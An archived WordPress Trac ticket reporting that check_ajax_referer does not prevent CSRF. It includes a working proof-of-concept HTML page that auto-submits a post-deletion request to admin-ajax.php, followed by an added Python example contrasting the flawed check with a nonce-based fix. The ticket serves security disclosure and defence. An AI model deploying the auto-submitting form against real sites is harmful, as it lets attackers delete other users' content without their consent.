[wp-trac] [WordPress Trac] #4939: check_ajax_referer does not protect from CSRF at all
WordPress Trac
wp-trac at lists.automattic.com
Sun Sep 9 01:05:28 GMT 2007
#4939: check_ajax_referer does not protect from CSRF at all
----------------------+-----------------------------------------------------
Reporter: xknown | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone:
Component: Security | Version: 2.3
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
`check_ajax_referer` only checks if the incoming request contains valid
user credentials but `wp_get_current_user` still uses WP cookies to
determine the current user, so anyone with a subscriber role (or another
role) can perform CSRF attacks.
{{{
<html>
<body>
<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
<input type="text" name="action" value="delete-post" />
<input type="text" name="id" value="Post_ID" />
<input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
}}}
--
Ticket URL: <http://trac.wordpress.org/ticket/4939>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
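The defect the ticket describes is that the referer check validates credentials carried in the request body while the user's identity is still taken from the browser-sent cookies, so the two never have to agree. The added example below (not code from the ticket or from WordPress) contrasts a constructed model of that legacy check with a nonce-based check in which the nonce is an HMAC over a time tick, the action and the cookie-identified user, the design WordPress's nonce functions later followed. The secret, session table, credential store, `_ajax_nonce` field name and 12-hour tick are all assumptions chosen for the example.

```python
"""Cookie-bound nonce check for an AJAX endpoint versus the body-credential
check described in WordPress ticket #4939.  Added example with constructed
secrets, sessions and requests; none of it is WordPress code."""
import hashlib
import hmac
import time

SECRET = b"constructed-server-secret"      # assumption: server-side secret
TICK_SECONDS = 12 * 60 * 60                # assumption: nonce validity window

# Constructed session table (login cookie value -> user id) and credential store.
SESSIONS = {"admin-session": 1, "subscriber-session": 7}
VALID_CREDENTIALS = {("subscriber", "password"), ("admin", "hunter2")}


def current_user(cookies):
    """Identity always comes from the browser-sent cookie, as the ticket says
    wp_get_current_user does."""
    return SESSIONS.get(cookies.get("wp_login"))


def check_ajax_referer_legacy(post):
    """Model of the check the ticket describes: it only asks whether the
    credentials posted in the body are valid and never looks at the cookie
    jar, so it says nothing about who the browser is actually logged in as."""
    pairs = dict(p.split("=", 1) for p in post.get("cookie", "").split("; ") if "=" in p)
    user = next((v for k, v in pairs.items() if k.startswith("wordpressuser_")), None)
    pw = next((v for k, v in pairs.items() if k.startswith("wordpresspass_")), None)
    return (user, pw) in VALID_CREDENTIALS


def _tick(now):
    return int(now // TICK_SECONDS)


def _nonce_for(tick, user_id, action):
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:16]


def create_nonce(user_id, action, now=None):
    """Minted only inside a page the user is already logged into; a
    third-party page cannot read it, so it cannot forge the request."""
    now = time.time() if now is None else now
    return _nonce_for(_tick(now), user_id, action)


def verify_nonce(nonce, user_id, action, now=None):
    """Accept the current or the previous tick so a page left open across a
    window boundary still works; constant-time compare throughout."""
    now = time.time() if now is None else now
    for tick in (_tick(now), _tick(now) - 1):
        if hmac.compare_digest(_nonce_for(tick, user_id, action), nonce):
            return True
    return False


def delete_post_legacy(cookies, post):
    """Identity from cookies, 'authorization' from whatever the body carries."""
    user_id = current_user(cookies)
    if user_id is None or not check_ajax_referer_legacy(post):
        return "forbidden"
    return f"user {user_id} deleted post {post['id']}"


def delete_post_hardened(cookies, post, now=None):
    """Identity from cookies, authorization from a nonce bound to that same
    identity and to the specific action."""
    user_id = current_user(cookies)
    if user_id is None:
        return "forbidden"
    action = f"delete-post_{post.get('id')}"
    if not verify_nonce(post.get("_ajax_nonce", ""), user_id, action, now):
        return "forbidden"
    return f"user {user_id} deleted post {post['id']}"


# Constructed requests: the victim's browser attaches the admin cookie; the
# body is what the ticket's auto-submitting form supplies.
ADMIN_COOKIES = {"wp_login": "admin-session"}
FORGED_POST = {"action": "delete-post", "id": "42",
               "cookie": "wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password"}


def demo(now=1_000_000):
    """Run the same forged body and a legitimately issued nonce through both
    handlers; returns a dict of outcomes keyed by scenario."""
    results = {}
    results["legacy_forged"] = delete_post_legacy(ADMIN_COOKIES, FORGED_POST)
    results["hardened_forged"] = delete_post_hardened(ADMIN_COOKIES, FORGED_POST, now)
    legit = {"action": "delete-post", "id": "42",
             "_ajax_nonce": create_nonce(1, "delete-post_42", now)}
    results["hardened_legit"] = delete_post_hardened(ADMIN_COOKIES, legit, now)
    results["hardened_expired"] = delete_post_hardened(ADMIN_COOKIES, legit, now + 3 * TICK_SECONDS)
    other = {"action": "delete-post", "id": "42",
             "_ajax_nonce": create_nonce(7, "delete-post_42", now)}
    results["hardened_other_user"] = delete_post_hardened(ADMIN_COOKIES, other, now)
    return results


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario:22s} {outcome}")
```

The point of the contrast is in `demo()`: the legacy handler accepts the forged body because the posted subscriber credentials are valid, even though the cookie says the request comes from the admin; the hardened handler rejects that body, rejects a nonce minted for a different user, rejects a nonce from an expired window, and accepts only a nonce issued to the cookie-identified user for that exact action.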